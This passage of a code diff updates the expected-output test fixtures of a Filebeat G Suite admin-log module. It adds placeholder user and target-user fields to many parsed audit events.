@@ -166,7 +172,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REORDER_GROUP_BASED_POLICIES_EVENT", @@ -220,7 +229,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GPLUS_PREMIUM_FEATURES", @@ -270,7 +282,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_MANAGED_CONFIGURATION", @@ -319,7 +334,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_MANAGED_CONFIGURATION", @@ -368,7 +386,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_MANAGED_CONFIGURATION", @@ -418,7 +439,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED", @@ -467,6 +491,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json index 110753ae98de..10e0ec1aac41 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-calendar-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_BUILDING", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_BUILDING", @@ -147,7 +153,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_CALENDAR_RESOURCE", @@ -196,7 +205,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CALENDAR_RESOURCE", @@ -245,7 +257,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_CALENDAR_RESOURCE_FEATURE", @@ -294,7 +309,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CALENDAR_RESOURCE_FEATURE", @@ -343,7 +361,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_CALENDAR_RESOURCE_FEATURE", @@ -396,7 +417,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_CALENDAR_RESOURCE", @@ -446,7 +470,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_CALENDAR_RESOURCE", @@ -498,7 +525,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CALENDAR_SETTING", @@ -554,7 +584,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CANCEL_CALENDAR_EVENTS", @@ -603,7 +636,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "RELEASE_CALENDAR_RESOURCES", @@ -652,6 +691,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json index 0c7828946dab..5fde8049c7c5 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chat-test.json.log-expected.json @@ -45,7 +45,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MEET_INTEROP_DELETE_GATEWAY", @@ -93,7 +96,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MEET_INTEROP_MODIFY_GATEWAY", @@ -142,7 +148,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHAT_SETTING", @@ -198,6 +207,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json index e4a8b7141108..4627a127b8f8 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-chromeos-test.json.log-expected.json @@ -54,7 +54,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DEVICE_STATE", @@ -105,7 +108,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_APPLICATION_SETTING", @@ -162,7 +168,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SEND_CHROME_OS_DEVICE_COMMAND", @@ -211,7 +220,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_DEVICE_ANNOTATION", @@ -259,7 +271,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_DEVICE_SETTING", @@ -311,7 +326,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_DEVICE_STATE", @@ -362,7 +380,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING", @@ -414,7 +435,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "INSERT_CHROME_OS_PRINT_SERVER", @@ -462,7 +486,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CHROME_OS_PRINT_SERVER", @@ -510,7 +537,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_CHROME_OS_PRINT_SERVER", @@ -560,7 +590,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "INSERT_CHROME_OS_PRINTER", @@ -608,7 +641,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_CHROME_OS_PRINTER", @@ -656,7 +692,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_CHROME_OS_PRINTER", @@ -706,7 +745,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_SETTING", @@ -758,7 +800,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CHROME_OS_USER_SETTING", @@ -810,7 +855,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ISSUE_DEVICE_COMMAND", @@ -863,7 +911,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOVE_DEVICE_TO_ORG_UNIT_DETAILED", @@ -914,7 +965,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_CHROME_OS_APPLICATION_SETTINGS", @@ -962,7 +1016,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_DEVICE", @@ -1011,7 +1068,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CONTACTS_SETTING", @@ -1064,6 +1124,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json index 3f0711022768..825e497e5a0f 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-contacts-test.json.log-expected.json @@ -50,6 +50,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json index b5c6d47d8b3b..01b558fdf49f 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-delegatedadmin-test.json.log-expected.json @@ -48,7 +48,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CREATE_ROLE", @@ -97,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_ROLE", @@ -146,7 +155,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_PRIVILEGE", @@ -196,7 +208,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_PRIVILEGE", @@ -246,7 +261,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_ROLE", @@ -295,7 +313,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_ROLE", @@ -344,7 +365,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNASSIGN_ROLE", @@ -395,6 +419,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json index 311ecf3e2378..da5410ee7d39 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-docs-test.json.log-expected.json @@ -48,7 +48,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "DRIVE_DATA_RESTORE", @@ -100,7 +106,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_DOCS_SETTING", @@ -156,6 +168,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json index ff5c3d1d2a59..05143097e3d0 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-domain-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_APPLICATION", @@ -96,7 +99,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_APPLICATION_TO_WHITELIST", @@ -145,7 +151,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ADVERTISEMENT_OPTION", @@ -195,7 +204,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_ALERT", @@ -243,7 +255,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ALERT_CRITERIA", @@ -291,7 +306,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_ALERT", @@ -339,7 +357,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ALERT_RECEIVERS_CHANGED", @@ -389,7 +410,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_ALERT", @@ -438,7 +462,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ALERT_STATUS_CHANGED", @@ -488,7 +515,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_DOMAIN_ALIAS", @@ -537,7 +567,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_DOMAIN_ALIAS", @@ -586,7 +619,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SKIP_DOMAIN_ALIAS_MX", @@ -635,7 +671,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_DOMAIN_ALIAS_MX", @@ -684,7 +723,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_DOMAIN_ALIAS", @@ -734,7 +776,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_OAUTH_ACCESS_TO_ALL_APIS", @@ -784,7 +829,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_ALLOW_ADMIN_PASSWORD_RESET", @@ -834,7 +882,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_API_ACCESS", @@ -885,7 +936,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "AUTHORIZE_API_CLIENT_ACCESS", @@ -938,7 +992,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_API_CLIENT_ACCESS", @@ -987,7 +1044,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_LICENSES_REDEEMED", @@ -1037,7 +1097,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_AUTO_ADD_NEW_SERVICE", @@ -1086,7 +1149,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_PRIMARY_DOMAIN", @@ -1135,7 +1201,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_WHITELIST_SETTING", @@ -1186,7 +1255,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMMUNICATION_PREFERENCES_SETTING_CHANGE", @@ -1238,7 +1310,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CONFLICT_ACCOUNT_ACTION", @@ -1288,7 +1363,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_FEEDBACK_SOLICITATION", @@ -1339,7 +1417,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_CONTACT_SHARING", @@ -1389,7 +1470,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_PLAY_FOR_WORK_TOKEN", @@ -1437,7 +1521,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_USE_CUSTOM_LOGO", @@ -1487,7 +1574,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CUSTOM_LOGO", @@ -1535,7 +1625,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DATA_LOCALIZATION_FOR_RUSSIA", @@ -1585,7 +1678,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DATA_LOCALIZATION_SETTING", @@ -1636,7 +1732,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO", @@ -1686,7 +1785,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_PLAY_FOR_WORK_TOKEN", @@ -1734,7 +1836,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VIEW_DNS_LOGIN_DETAILS", @@ -1782,7 +1887,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_DEFAULT_LOCALE", @@ -1832,7 +1940,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_DEFAULT_TIMEZONE", @@ -1882,7 +1993,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_NAME", @@ -1931,7 +2045,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_ENABLE_PRE_RELEASE_FEATURES", @@ -1980,7 +2097,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_DOMAIN_SUPPORT_MESSAGE", @@ -2030,7 +2150,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_TRUSTED_DOMAINS", @@ -2078,7 +2201,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_TRUSTED_DOMAINS", @@ -2126,7 +2252,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_EDU_TYPE", @@ -2176,7 +2305,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_ENABLE_OAUTH_CONSUMER_KEY", @@ -2226,7 +2358,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_SSO_ENABLED", @@ -2276,7 +2411,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_SSL", @@ -2326,7 +2464,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_EU_REPRESENTATIVE_CONTACT_INFO", @@ -2376,7 +2517,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GENERATE_TRANSFER_TOKEN", @@ -2423,7 +2567,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_LOGIN_BACKGROUND_COLOR", @@ -2473,7 +2620,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_LOGIN_BORDER_COLOR", @@ -2523,7 +2673,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_LOGIN_ACTIVITY_TRACE", @@ -2573,7 +2726,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "PLAY_FOR_WORK_ENROLL", @@ -2622,7 +2778,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "PLAY_FOR_WORK_UNENROLL", @@ -2670,7 +2829,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MX_RECORD_VERIFICATION_CLAIM", @@ -2720,7 +2882,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "TOGGLE_NEW_APP_FEATURES", @@ -2770,7 +2938,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_USE_NEXT_GEN_CONTROL_PANEL", @@ -2820,7 +2991,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPLOAD_OAUTH_CERTIFICATE", @@ -2868,7 +3042,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REGENERATE_OAUTH_CONSUMER_SECRET", @@ -2916,7 +3093,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_OPEN_ID_ENABLED", @@ -2966,7 +3146,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ORGANIZATION_NAME", @@ -3016,7 +3199,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_OUTBOUND_RELAY", @@ -3068,7 +3254,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_PASSWORD_MAX_LENGTH", @@ -3118,7 +3307,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_PASSWORD_MIN_LENGTH", @@ -3168,7 +3360,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL", @@ -3218,7 +3413,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS", @@ -3269,7 +3467,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_APPLICATION", @@ -3318,7 +3519,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { 